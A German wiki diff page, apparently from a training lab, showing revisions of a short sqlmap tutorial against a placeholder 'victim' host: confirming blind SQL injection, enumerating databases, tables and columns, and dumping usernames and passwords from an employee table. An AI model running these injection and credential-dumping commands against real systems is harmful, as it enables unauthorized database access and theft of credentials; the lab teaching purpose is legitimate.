Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt)
Zeile 3: Zeile 3:
  
 
=Datenbanken anzeigen (optional)=
 
=Datenbanken anzeigen (optional)=
 
 
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
 
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
  
 
=Verwundbarkeit bestätigen=
 
=Verwundbarkeit bestätigen=
  
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --technique=B --batch --string=VALID
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --batch --string=VALID --flush-session
  
 
=Tabellen der Datenbank tuxmen=
 
=Tabellen der Datenbank tuxmen=
Zeile 20: Zeile 19:
 
=Daten dumpen=
 
=Daten dumpen=
  
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID

Aktuelle Version vom 25. Juni 2026, 05:42 Uhr

Ausgabe aller Parameter und Optionen

  • sqlmap -hh

Datenbanken anzeigen (optional)

Verwundbarkeit bestätigen

Tabellen der Datenbank tuxmen

Spalten der Tabelle mitarbeiter

Daten dumpen